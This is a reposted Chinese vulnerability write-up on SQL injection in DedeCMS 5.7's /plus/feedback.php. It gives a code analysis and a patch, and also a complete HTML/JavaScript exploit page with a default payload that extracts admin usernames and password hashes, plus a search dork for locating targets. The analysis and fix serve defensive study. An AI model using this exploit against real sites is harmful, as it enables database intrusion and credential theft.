當(dāng)前位置：首頁 > 编程语言 > php >内容正文

php

dedecms /plus/feedback.php SQL Injection Vul

發(fā)布時(shí)間：2024/4/17 php 37 豆豆

生活随笔收集整理的這篇文章主要介紹了 dedecms /plus/feedback.php SQL Injection Vul 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

catalog

1. 漏洞描述 2. 漏洞觸發(fā)條件 3. 漏洞影響范圍 4. 漏洞代碼分析 5. 防御方法 6. 攻防思考

1. 漏洞描述

1. Dedecms v5.7的plus\feedback.php SQL沒有正確驗(yàn)證用戶提供的輸入，在實(shí)現(xiàn)上中存在注入漏洞 2. 攻擊者可以利用DEDECMS的變量覆蓋漏洞向數(shù)據(jù)庫中注入WEBSHELL Payload 3. 在另一個(gè)代碼流，攻擊者可以觸發(fā)二次注入

Relevant Link:

http://sebug.net/vuldb/ssvid-60549 http://www.venustech.com.cn/NewsInfo/124/17697.Html http://www.sorry404.com/chengxuwenti/20140504/47.html

2. 漏洞觸發(fā)條件

0x1: POC

<html> <head> <title>DedeCms v5.7 feedback.php exp</title> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <script language='javascript'> y = document.form1.addr.value; function exploit() { var yanzhen = document.getElementById("yanzhen").value;var aid = document.getElementById("aid").value;var sqli = document.getElementById("sqli").value;document.form1.typeid.value = "0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'), ('" + aid +"','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',"+sqli+")#";document.form1.action = document.form1.addr.value + "/plus/feedback.php";document.form1.te.name = "action";document.form1.submit(); } function getyanzhen() {var x = "<img src='"+ document.form1.addr.value +"/include/vdimgck.php' width='60' height='24' οnclick=\"this.src=this.src+'?'\">";document.body.innerHTML+=x;document.form1.addr.value = y; } function look() {window.location.href = document.form1.addr.value+"/plus/feedback.php?aid="+document.getElementById("aid").value; } </script> </head> <body> ############################################################<br/> DedeCms v5.7 feedback.php $typeid SQLi<br/> Dork:inurl:plus/feedback.php?aid=<br/> ############################################################<br/><br/> <form action="xxx" method="get" name="form1" target="_blank"> 程序URL:<input type="text" id="addr" value="http://" /><br/> 驗(yàn)證碼:<input type="text" name="validate" id="yanzhen" value=""/><br/> 存在的Aid:<input type="text" id="aid" value="1"/><br/> SQL注入語句:<input type="text" id="sqli" value="(SELECT concat(uname,0x5f,pwd,0x5f) FROM `dede_admin`)" style="width:500px;"/><br/> <input type="hidden" name="" id="te" value="send"/> <input type="hidden" name="comtype" value="comments"/> <input type="hidden" name="fid" value="1"/> <input type="hidden" name="isconfirm" value="yes"/> <input type="hidden" name="msg" value="90sec"/> <input type="hidden" name="typeid" value=""/> <input type="button" οnclick="getyanzhen();" value="獲取驗(yàn)證碼"> <input type="button" onClick="exploit()" value="#Exploit#" /> <input type="button" onClick="look()" value="查看結(jié)果" /><br/> </form> </body> </html>

Relevant Link:

http://www.oday.pw/WEBanquan/111312.html

3. 漏洞影響范圍

<= dedecms 5.7

4. 漏洞代碼分析

\plus\feedback.php

.. //保存評(píng)論內(nèi)容 if($comtype == 'comments') {$arctitle = addslashes($title);if($msg!=''){//$typeid變量未做初始化$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";$rs = $dsql->ExecuteNoneQuery($inquery);if(!$rs){ShowMsg(' 發(fā)表評(píng)論錯(cuò)誤! ', '-1');//echo $dsql->GetError(); exit();}} } //引用回復(fù) elseif ($comtype == 'reply') {$row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");//未對(duì)數(shù)據(jù)庫查詢的$row['arctitle']進(jìn)行有效過濾，造成二次注入$arctitle = $row['arctitle'];$aid =$row['aid'];$msg = $quotemsg.$msg;$msg = HtmlReplace($msg,2);$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";$dsql->ExecuteNoneQuery($inquery); } ..

Relevant Link:

http://www.yunsec.net/a/security/web/jbst/2012/1103/11816.html

5. 防御方法

\plus\feedback.php

//保存評(píng)論內(nèi)容if($comtype == 'comments'){ $arctitle = addslashes($title);/* 增加規(guī)范化、過濾邏輯 */$typeid = intval($typeid);$ischeck = intval($ischeck);$feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);/**/if($msg!=''){//$typeid變量未做初始化$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";$rs = $dsql->ExecuteNoneQuery($inquery);if(!$rs){ShowMsg(' 發(fā)表評(píng)論錯(cuò)誤! ', '-1');//echo $dsql->GetError(); exit();}}}//引用回復(fù)elseif ($comtype == 'reply'){$row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");//未對(duì)數(shù)據(jù)庫查詢的$row['arctitle']進(jìn)行有效過濾，造成二次注入$arctitle = $row['arctitle'];/* 增加轉(zhuǎn)義邏輯 */$arctitle = addslashes($row['arctitle']);/* */$aid =$row['aid'];$msg = $quotemsg.$msg;$msg = HtmlReplace($msg,2);$inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";$dsql->ExecuteNoneQuery($inquery);}

6. 攻防思考

轉(zhuǎn)載于:https://www.cnblogs.com/LittleHann/p/4507729.html

總結(jié)

以上是生活随笔為你收集整理的dedecms /plus/feedback.php SQL Injection Vul的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。